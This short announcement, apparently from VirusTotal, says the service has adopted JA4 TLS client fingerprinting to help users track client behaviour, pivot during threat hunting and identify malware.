JA4: Elevating Threat Hunting on VirusTotal

VirusTotal's adoption of JA4 client fingerprinting will provide users with an invaluable tool for dissecting and tracking TLS client behaviors, leading to enhanced threat hunting, pivoting, and more robust malware identification.

Happy Hunting.

❌